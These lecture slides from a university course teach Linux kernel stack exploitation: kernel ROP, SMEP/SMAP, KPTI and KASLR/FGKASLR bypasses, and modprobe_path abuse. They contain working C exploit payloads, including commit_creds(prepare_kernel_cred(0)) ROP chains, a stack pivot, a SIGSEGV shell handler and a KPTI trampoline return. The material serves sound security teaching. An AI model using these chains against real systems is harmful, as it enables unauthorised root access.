ENPM809V

Kernel Hacking - Stack Part 2

Agenda

  • Kernel ROP
  • Bypassing SMEP/SMAP in depth
  • Bypassing KPTI in depth
  • Bypass KASLR and FGKASLR

Kernel ROP

What is it?

  • Kernel ROP works exactly like user-space ROP.
    • Except we are ROPing within the kernel
  • The same principles apply: we use the ret instruction to jump between snippets of existing code (gadgets).

What is it?

  • Instead of jumping to Gadgets within the binary or within LIBC, we are utilizing the Kernel!
    • The entire kernel is fair game for us as long as we have access to it (meaning if it's part of the core kernel or a module that's loaded in).
  • Caveat

Caveat

  • The gadgets need to be in executable memory!
  • Let's figure out how we can actually find some gadgets.

Caveat

Let's say we don't have KASLR enabled, where can we find these addresses?
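
One place to look is /proc/kallsyms, which this deck uses later to find the KPTI trampoline. Below is a minimal sketch of a lookup helper. The function names are made up for illustration, and it assumes you can actually read the file: on many systems unprivileged users only see zeroed addresses.

```c
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms-style line: "<hex address> <type> <name> [module]".
 * Returns 1 and stores the address if the name matches, otherwise 0. */
int match_kallsyms_line(const char *line, const char *wanted,
                        unsigned long long *addr)
{
    unsigned long long value;
    char type;
    char name[256];

    if (sscanf(line, "%llx %c %255s", &value, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;
    *addr = value;
    return 1;
}

/* Scan /proc/kallsyms for a symbol. Returns 0 if the symbol is missing
 * or the file cannot be opened. */
unsigned long long lookup_kallsyms(const char *wanted)
{
    char line[512];
    unsigned long long addr = 0;
    FILE *fp = fopen("/proc/kallsyms", "r");

    if (!fp)
        return 0;
    while (fgets(line, sizeof(line), fp))
        if (match_kallsyms_line(line, wanted, &addr))
            break;
    fclose(fp);
    return addr;
}
```

With KASLR off, lookup_kallsyms("commit_creds") gives an address you can hardcode into the exploit, because it is the same on every boot.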

SMEP Enabled

Review of SMEP...

  • SMEP is protecting against execution of code stored in userspace when in kernel mode.
    • Kernel cannot trust code stored in userspace virtual memory
    • Hardware implemented (bit 20 of the CR4 register determines if SMEP is on/off)
  • Any time the CPU tries to execute code stored in a userspace page while in kernel mode, it raises a fault instead.
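
If you manage to read a CR4 value (for example from a kernel oops message), checking the protection bits is a one-liner. A small sketch: the SMEP bit position comes from the slide, the SMAP position (bit 21) is from the Intel manuals, and the helper names are made up.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20) /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21) /* Supervisor Mode Access Prevention */

/* Return 1 if the given CR4 value has SMEP enabled. */
int cr4_has_smep(uint64_t cr4)
{
    return (cr4 & CR4_SMEP) != 0;
}

/* Return 1 if the given CR4 value has SMAP enabled. */
int cr4_has_smap(uint64_t cr4)
{
    return (cr4 & CR4_SMAP) != 0;
}
```

For example, a CR4 of 0x3006f0 has both bits set, while 0x1006f0 has only SMEP.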

Review of SMEP...

  • Not 100% foolproof
    • We can still read from and write to userspace pages!
      • Copy a ROP chain from userspace??????
    • We still have all userspace and kernelspace memory under one page table
      • KPTI protection not enabled

How can we exploit?

  • We will build a kernel ROP chain
    • padding
    • stack-cookie
    • overwrite stored RBP
    • prepare_kernel_cred
    • commit_creds
    • swapgs
    • iretq
    • store userrip, usercs, userrflags, usersp, and userss in that order on the stack
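
The last bullet is the frame that iretq pops off the stack. A minimal sketch of that layout, with a made-up struct and helper name, assuming the five values were saved from userspace before triggering the bug:

```c
#include <stddef.h>
#include <stdint.h>

/* What iretq expects on the stack, lowest address first. */
struct iret_frame {
    uint64_t rip;    /* where to resume in userspace */
    uint64_t cs;     /* saved user code segment */
    uint64_t rflags; /* saved user flags */
    uint64_t rsp;    /* saved user stack pointer */
    uint64_t ss;     /* saved user stack segment */
};

/* Append the frame to a chain of 64-bit slots and return the new index. */
size_t push_iret_frame(uint64_t *chain, size_t off, const struct iret_frame *f)
{
    chain[off++] = f->rip;
    chain[off++] = f->cs;
    chain[off++] = f->rflags;
    chain[off++] = f->rsp;
    chain[off++] = f->ss;
    return off;
}
```

The order matters: if any two slots are swapped, iretq loads garbage into the segment registers or the stack pointer and the return faults.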

How can we exploit?

  • Issues with this:
    • When finding ROP gadgets, not all gadgets in the kernel are going to be usable.
    • Therefore, you are likely going to have to search for and use something a bit more complicated.
      • Must be in executable kernel memory.

Example:

unsigned long user_rip = (unsigned long)get_shell;

unsigned long pop_rdi_ret = 0xffffffff81006370;
unsigned long pop_rdx_ret = 0xffffffff81007616; // pop rdx ; ret
unsigned long cmp_rdx_jne_pop2_ret = 0xffffffff81964cc4; // cmp rdx, 8 ; jne 0xffffffff81964cbb ; pop rbx ; pop rbp ; ret
unsigned long mov_rdi_rax_jne_pop2_ret = 0xffffffff8166fea3; // mov rdi, rax ; jne 0xffffffff8166fe7a ; pop rbx ; pop rbp ; ret
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long swapgs_pop1_ret = 0xffffffff8100a55f; // swapgs ; pop rbp ; ret
unsigned long iretq = 0xffffffff8100c0d9;

void overflow(void){
    unsigned n = 50;
    unsigned long payload[n];
    unsigned off = 16;
    payload[off++] = cookie;
    payload[off++] = 0x0; // rbx
    payload[off++] = 0x0; // r12
    payload[off++] = 0x0; // rbp
    payload[off++] = pop_rdi_ret; // return address
    payload[off++] = 0x0; // rdi <- 0
    payload[off++] = prepare_kernel_cred; // prepare_kernel_cred(0)
    payload[off++] = pop_rdx_ret;
    payload[off++] = 0x8; // rdx <- 8
    payload[off++] = cmp_rdx_jne_pop2_ret; // make sure JNE doesn't branch
    payload[off++] = 0x0; // dummy rbx
    payload[off++] = 0x0; // dummy rbp
    payload[off++] = mov_rdi_rax_jne_pop2_ret; // rdi <- rax
    payload[off++] = 0x0; // dummy rbx
    payload[off++] = 0x0; // dummy rbp
    payload[off++] = commit_creds; // commit_creds(prepare_kernel_cred(0))
    payload[off++] = swapgs_pop1_ret; // swapgs
    payload[off++] = 0x0; // dummy rbp
    payload[off++] = iretq; // iretq frame
    payload[off++] = user_rip;
    payload[off++] = user_cs;
    payload[off++] = user_rflags;
    payload[off++] = user_sp;
    payload[off++] = user_ss;

    puts("[*] Prepared payload");
    ssize_t w = write(global_fd, payload, sizeof(payload));

    puts("[!] Should never be reached");
}

Other issues:

  • In the kernel, sometimes your stack is not big enough to hold the entire ROP chain
  • Because SMAP is not enabled, we can mmap a region of RWX memory in userspace, then change RSP to point to that region of memory.

Stack Pivoting:

  • How can we do this?
    • We first need to find an executable gadget that lets us change RSP somehow.
      • Example: this modifies RSP to be 0x5b000000
      • Remember - if you do mov esp, it modifies the lower 32 bits and zeroes the upper 32 bits
unsigned long mov_esp_pop2_ret = 0xffffffff8196f56a; // mov esp, 0x5b000000 ; pop r12 ; pop rbp ; ret
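
The zero-extension rule is what makes this gadget useful: the kernel stack pointer becomes a low address that userspace is allowed to mmap. A tiny model of the instruction (the function name is made up for illustration):

```c
#include <stdint.h>

/* Model of `mov esp, imm32` on x86-64: writing a 32-bit register
 * zero-extends the result into the full 64-bit register. */
uint64_t rsp_after_mov_esp(uint64_t old_rsp, uint32_t imm32)
{
    (void)old_rsp; /* the old upper 32 bits are simply discarded */
    return (uint64_t)imm32;
}
```

Whatever kernel address RSP held before, after the gadget it is exactly 0x5b000000.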

Stack Pivoting:

void build_fake_stack(void){
    fake_stack = mmap((void *)0x5b000000 - 0x1000, 
    	0x2000,
        PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
        -1,
        0);
    unsigned off = 0x1000 / 8;
    fake_stack[0] = 0xdead; // put something in the first page to prevent fault
    fake_stack[off++] = 0x0; // dummy r12
    fake_stack[off++] = 0x0; // dummy rbp
    fake_stack[off++] = pop_rdi_ret;
    ... // the rest of the chain is the same as the last payload
}

void overflow(void)
{
    unsigned n = 50;
    unsigned long payload[n];
    unsigned off = 16;
    payload[off++] = cookie;
    payload[off++] = 0x0; // rbx
    payload[off++] = 0x0; // r12
    payload[off++] = 0x0; // rbp
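    payload[off++] = mov_esp_pop2_ret; // return address: pivot RSP to 0x5b000000

    write(global_fd, payload, sizeof(payload)); // trigger the overflow, as in the earlier payload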
}

I noticed something...

  • Why 0x5b000000-0x1000:
    • This leaves room for the stack to grow downward. Functions like prepare_kernel_cred and commit_creds call other functions, which push data below the pivot address.
  • Why did I put 0xdead at fake_stack[0]?
    • A freshly mmap'd page is not actually mapped in until it is first touched. If the kernel takes that page fault while running on our fake stack, it turns into a double fault.
    • Writing the ROP chain touches the second page (that is where the starting offset points), so no double fault there!
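
The layout arithmetic is easy to get wrong, so here is a small sketch of it. The constants match the mmap call and the gadget above; the helper names are made up.

```c
#include <stddef.h>
#include <stdint.h>

#define PIVOT_ADDR     0x5b000000ULL /* value the gadget loads into RSP */
#define FAKE_PAGE_SIZE 0x1000ULL

/* Address passed to mmap: one page below the pivot target. */
uint64_t fake_stack_base(void)
{
    return PIVOT_ADDR - FAKE_PAGE_SIZE;
}

/* Index of the first chain slot when the mapping is viewed as uint64_t[]. */
size_t first_chain_slot(void)
{
    return (size_t)(FAKE_PAGE_SIZE / sizeof(uint64_t));
}

/* Virtual address of a given slot in the fake stack. */
uint64_t slot_address(size_t idx)
{
    return fake_stack_base() + (uint64_t)idx * sizeof(uint64_t);
}
```

Slot 512 (0x1000 / 8) lands exactly on 0x5b000000, which is where RSP points after the pivot. Everything below it, starting at 0x5afff000, is growth room.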

SMAP Enabled

Hardest So Far!

  • With SMAP, the kernel can no longer directly read or write userspace pages.
    • This means that we cannot pivot the stack into userspace memory to run our ROP chain!

What does this mean

  • You have a couple of options:
    • Figure out a way to overwrite the values in the CR4 register to turn off SMEP/SMAP (which is significantly harder to do in newer kernels)
      • Patch was made in Linux Kernel 5.3 to native_write_cr4
    • Utilize the stack that we have to craft our exploit!

Why is overwriting CR4 harder in newer kernels?
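
Since that patch, native_write_cr4 checks the value it just wrote and puts back any "pinned" bits that were cleared. The following is a simplified userspace model of that idea, not the kernel's code: the mask here only covers SMEP and SMAP (the real one covers more bits), and all names are stand-ins.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)
#define CR4_SMAP (1ULL << 21)

/* Stand-ins for the kernel's pinned mask and the values pinned at boot. */
static const uint64_t pinned_mask = CR4_SMEP | CR4_SMAP;
static const uint64_t pinned_bits = CR4_SMEP | CR4_SMAP;

/* Return the value that ends up in the modeled CR4 after a write. */
uint64_t model_write_cr4(uint64_t val)
{
    /* If a pinned bit was changed, force it back to its boot value. */
    if ((val & pinned_mask) != pinned_bits)
        val = (val & ~pinned_mask) | pinned_bits;
    return val;
}
```

So a chain that does pop rdi ; 0x6f0 ; native_write_cr4 no longer turns the protections off: in this model the register ends up as 0x3006f0 again.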

// From https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#references

uint64_t user_cs, user_ss, user_rflags, user_sp;

uint64_t user_rip = (uint64_t) spawn_shell;

void privilege_escalation() {
    uint8_t sz = 35;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = pop_rdi_ret;
    payload[cookie_off++] = 0x0;	// Set up for rdi=0
    payload[cookie_off++] = prepare_kernel_cred; // prepare_kernel_cred(0)
    payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1; // save ret val in rdi
    payload[cookie_off++] = 0x0; //compensate for extra pop rbp
    payload[cookie_off++] = commit_creds; // commit_creds(rdi)
    payload[cookie_off++] = swapgs_pop1_ret;
    payload[cookie_off++] = 0x0;  // compensate for extra pop rbp
    payload[cookie_off++] = iretq;
    payload[cookie_off++] = user_rip; // Notice the reverse order ...
    payload[cookie_off++] = user_cs; // compared to how ...
    payload[cookie_off++] = user_rflags; // we returned these ...
    payload[cookie_off++] = user_sp; // in the earlier ...
    payload[cookie_off++] = user_ss; // exploit :)

    uint64_t data = write(global_fd, payload, sizeof(payload));

    puts("[!] If you can read this we failed the mission :(");
}

int main(int argc, char** argv) {
    open_dev();
    leak_cookie();
    save_state();
    privilege_escalation(); // send the ROP chain defined above
}

KPTI Enabled

What does this do?

  • Separates the user-space and kernel-space page tables entirely!
  • We can no longer just use swapgs and iretq to get back to userspace: we would land there with the kernel page tables still loaded, and the process dies with a SIGSEGV.

How do we bypass?

  • Method 1: we can use a signal handler.
    • When the kernel sends SIGSEGV, we transfer execution back to the user!
    • In the signal handler, we can call execve("/bin/sh", 0, 0)
    • Takes care of the work for us!
  • Method 2: swapgs+KPTI trampoline.
    • The KPTI trampoline is the kernel's normal way of switching page tables on the way back to userspace. It swaps CR3, then runs swapgs and iretq
      • Sometimes a ROP Gadget can have all of these instructions for us

How do we bypass?

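  • Method 3 - Utilizing modprobe
    • For this method we put our payload in a file (for example a shell script) that the kernel will run for us in place of modprobe.
    • We store it somewhere in the filesystem
    • Then we overwrite modprobe_path, which the kernel reads when it executes call_modprobe
      • It is used as the path (first argument) of the helper program that gets run as root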
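
The userspace half of this can be sketched as follows. This is only the file staging, under assumptions: the paths and script contents are placeholders, and the kernel-side write that points modprobe_path at the helper is not shown. The second file has an unrecognized magic number, which is the usual way to make the kernel go looking for a module loader when you try to execute it.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create an executable file with the given contents; returns 0 on success. */
int write_exec_file(const char *path, const void *data, size_t len)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, len);
    close(fd);
    if (n != (ssize_t)len)
        return -1;
    return chmod(path, 0755); /* the umask may have stripped the exec bits */
}

/* Stage the helper script and the trigger file. Both paths are chosen
 * by the caller; the script body is a harmless placeholder. */
int stage_modprobe_files(const char *helper_path, const char *trigger_path)
{
    static const char script[] = "#!/bin/sh\nid > /tmp/modprobe_ran\n";
    static const char bad_magic[] = "\xff\xff\xff\xff";

    if (write_exec_file(helper_path, script, sizeof(script) - 1) != 0)
        return -1;
    return write_exec_file(trigger_path, bad_magic, sizeof(bad_magic) - 1);
}
```

After the exploit has overwritten modprobe_path with the helper's path, executing the trigger file should make the kernel run the helper as root. No return to userspace from the ROP chain is needed for that part.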

How do we bypass?

cat /proc/kallsyms | grep swapgs_restore_regs_and_return_to_usermode
-> ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode

How do we bypass?

This is what the start of the function looks like:

.text:FFFFFFFF81200F10                 pop     r15
.text:FFFFFFFF81200F12                 pop     r14
.text:FFFFFFFF81200F14                 pop     r13
.text:FFFFFFFF81200F16                 pop     r12
.text:FFFFFFFF81200F18                 pop     rbp
.text:FFFFFFFF81200F19                 pop     rbx
.text:FFFFFFFF81200F1A                 pop     r11
.text:FFFFFFFF81200F1C                 pop     r10
.text:FFFFFFFF81200F1E                 pop     r9
.text:FFFFFFFF81200F20                 pop     r8
.text:FFFFFFFF81200F22                 pop     rax
.text:FFFFFFFF81200F23                 pop     rcx
.text:FFFFFFFF81200F24                 pop     rdx
.text:FFFFFFFF81200F25                 pop     rsi
.text:FFFFFFFF81200F26                 mov     rdi, rsp
.text:FFFFFFFF81200F29                 mov     rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32                 push    qword ptr [rdi+30h]
.text:FFFFFFFF81200F35                 push    qword ptr [rdi+28h]
.text:FFFFFFFF81200F38                 push    qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B                 push    qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E                 push    qword ptr [rdi+10h]
.text:FFFFFFFF81200F41                 push    qword ptr [rdi]
.text:FFFFFFFF81200F43                 push    rax
.text:FFFFFFFF81200F44                 jmp     short loc_FFFFFFFF81200F89
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89                               pop     rax
.text:FFFFFFFF81200F8A                               pop     rdi
.text:FFFFFFFF81200F8B                               call    cs:off_FFFFFFFF82040088
.text:FFFFFFFF81200F91                               jmp     cs:off_FFFFFFFF82040080
...
.text.native_swapgs:FFFFFFFF8146D4E0                 push    rbp
.text.native_swapgs:FFFFFFFF8146D4E1                 mov     rbp, rsp
.text.native_swapgs:FFFFFFFF8146D4E4                 swapgs
.text.native_swapgs:FFFFFFFF8146D4E7                 pop     rbp
.text.native_swapgs:FFFFFFFF8146D4E8                 retn
...
.text:FFFFFFFF8120102E                               mov     rdi, cr3
.text:FFFFFFFF81201031                               jmp     short loc_FFFFFFFF81201067
...
.text:FFFFFFFF81201067                               or      rdi, 1000h
.text:FFFFFFFF8120106E                               mov     cr3, rdi
...
.text:FFFFFFFF81200FC7                               iretq
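
The or rdi, 1000h in the listing is the actual page table switch: the user copy of the top-level page table sits one page above the kernel copy, so setting bit 12 of CR3 selects it. A one-function model of that step (the names are made up, and only the bit shown in the listing is modeled):

```c
#include <stdint.h>

#define USER_PGD_BIT 12 /* matches the 0x1000 in the listing */

/* Model of `or rdi, 0x1000 ; mov cr3, rdi`. */
uint64_t user_cr3_from_kernel_cr3(uint64_t kernel_cr3)
{
    return kernel_cr3 | (1ULL << USER_PGD_BIT);
}
```

This is the step a plain swapgs ; iretq chain skips, which is why it crashes once KPTI is on.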

How do we bypass?

void overflow(void){
    // ...
    payload[off++] = commit_creds; // commit_creds(prepare_kernel_cred(0))
    payload[off++] = kpti_trampoline; // swapgs_restore_regs_and_return_to_usermode + 22
    payload[off++] = 0x0; // dummy rax
    payload[off++] = 0x0; // dummy rdi
    payload[off++] = user_rip;
    payload[off++] = user_cs;
    payload[off++] = user_rflags;
    payload[off++] = user_sp;
    payload[off++] = user_ss;
    // ...
}
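
The + 22 skips the long run of pops and enters the function at mov rdi, rsp. A short sketch of computing the entry point and appending the tail of the chain. The helper names are made up, and the offset is only valid for the build disassembled above, so check it against your own kernel.

```c
#include <stddef.h>
#include <stdint.h>

#define TRAMPOLINE_SKIP 22 /* bytes of pops skipped in this particular build */

/* Entry point inside swapgs_restore_regs_and_return_to_usermode. */
uint64_t kpti_trampoline_addr(uint64_t symbol_addr)
{
    return symbol_addr + TRAMPOLINE_SKIP;
}

/* Append the trampoline, two filler slots and the five-slot iretq frame
 * (rip, cs, rflags, rsp, ss). Returns the new index. */
size_t push_kpti_return(uint64_t *chain, size_t off, uint64_t trampoline,
                        const uint64_t frame[5])
{
    chain[off++] = trampoline;
    chain[off++] = 0x0; /* filler consumed by the trampoline */
    chain[off++] = 0x0; /* filler consumed by the trampoline */
    for (size_t i = 0; i < 5; i++)
        chain[off++] = frame[i];
    return off;
}
```

With the symbol at 0xffffffff81200f10 from the kallsyms output above, the entry point is 0xffffffff81200f26.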

Bypassing via Signals

  • Instead of modifying our ROP chain to add in the KPTI trampoline, we keep the chain from the SMEP/SMAP section and register a SIGSEGV handler

void spawn_shell() {
	/* Same as before as we're already back in user-land
    *  when this gets executed so SMEP/SMAP won't interfere
    */
}

struct sigaction sigact;

void register_sigsegv() {
    puts("[+] Registering default action upon encountering a SIGSEGV!");
    sigact.sa_handler = spawn_shell;
    sigemptyset(&sigact.sa_mask);
    sigact.sa_flags = 0;
    sigaction(SIGSEGV, &sigact, (struct sigaction*) NULL);
}

int main(int argc, char** argv) {
	register_sigsegv();
    open_dev();
    leak_cookie();
    save_state();
    write_shellcode(); // This does our commit_creds(prepare_kernel_cred(0))
}

Using modprobe()

  • We are going to reference an outside resource for this.
  • Why?
    • To show you how I learn new concepts and begin to implement them.

KASLR

What is it?

  • Randomizes the base address the kernel is loaded at on every boot
  • This is the exact same concept as userspace ASLR, except it applies to the kernel
  • What does it randomize?
    • Stack Addresses
    • Data Addresses
    • Function Addresses

FGKASLR - KASLR on Steroids

  • This is even more granular KASLR
  • Randomizes the offsets of various memory addresses, not just the base address
    • Functions are not always at the same offset from the kernel base
  • Significantly more difficult to exploit reliably!

Doesn't Randomize Everything

  • Separately, there is still __randomize_layout, which randomizes the field order of marked kernel structs.

How are we going to bypass KASLR?

  • This requires a leak! We need to figure out the runtime addresses of the functions we want to use
    • In this case prepare_kernel_cred() and commit_creds()
  • We then can use the same exact exploit as before to actually craft our ROP Chain.
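
With plain KASLR the whole kernel image moves as one block, so a single leaked pointer is enough. A minimal sketch of the rebasing arithmetic, with made-up helper names. It assumes you know what the leaked pointer's address would be without KASLR, for example from a copy of the same kernel booted with nokaslr.

```c
#include <stdint.h>

/* How far the kernel moved: runtime address minus the no-KASLR address
 * of the same symbol. */
uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t nokaslr_addr)
{
    return leaked_addr - nokaslr_addr;
}

/* Apply the slide to any other no-KASLR address (gadget or function). */
uint64_t rebase(uint64_t nokaslr_addr, uint64_t slide)
{
    return nokaslr_addr + slide;
}
```

Every gadget and function address in the earlier payloads then becomes rebase(address, slide) instead of a hardcoded constant.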

What about FGKASLR?

  • This is a little bit trickier, but we are still in luck!
    • Not every function is randomized!
    • The KPTI trampoline and modprobe_path are not affected by it!
  • We can also get the functions we want by parsing the ksymtab!
    • Each ksymtab entry stores the offset of an exported symbol in a kernel_symbol struct.
    • Entries are generated by the EXPORT_SYMBOL macro:

      EXPORT_SYMBOL(my_function);

What about FGKASLR?

From: https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#references

What does this mean?

  • You have two paths to exploitation
    • Abuse modprobe
    • Modify your commit_creds(prepare_kernel_cred(0)) exploit
      • Instead of getting the addresses of the functions directly (by calculating an offset or reading /proc/kallsyms), you are going to want to get them from __ksymtab_function->value_offset
        • You still need to leak the kernel base address to do this, but each ksymtab entry always sits at the same offset from that base for a given kernel build
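
Turning a ksymtab entry into a function address is one addition. A sketch assuming the relative-offset layout used on x86-64, where value_offset is a signed 32-bit distance measured from the address of the field itself. The struct mirrors the kernel's, but the third field only exists on newer kernels and the helper name is made up.

```c
#include <stdint.h>

/* Layout of one ksymtab entry when relative offsets are in use. */
struct kernel_symbol {
    int32_t value_offset;     /* symbol address, relative to this field */
    int32_t name_offset;      /* symbol name, relative to this field */
    int32_t namespace_offset; /* only present on newer kernels */
};

/* Resolve the symbol address from the runtime address of the entry and
 * the value_offset read out of it (for example via an arbitrary read). */
uint64_t ksymtab_resolve(uint64_t entry_addr, int32_t value_offset)
{
    /* Sign-extend first so negative offsets point backwards. */
    return entry_addr + (uint64_t)(int64_t)value_offset;
}
```

In a ROP chain this means reading 4 bytes at base + offset of __ksymtab_commit_creds, then adding them to the entry's own address to get the randomized location of commit_creds.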

Alternative Approach

  • Use the modprobe_path exploit
    • modprobe_path is not affected by FG-KASLR

Continued Learning

Working Through ModProbe_Path

  • 0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/ 
    • Shows how to do it and craft exploits that will dump /proc/kallsyms

Kernel Hacking - Stack Part 2

By Ragnar Security
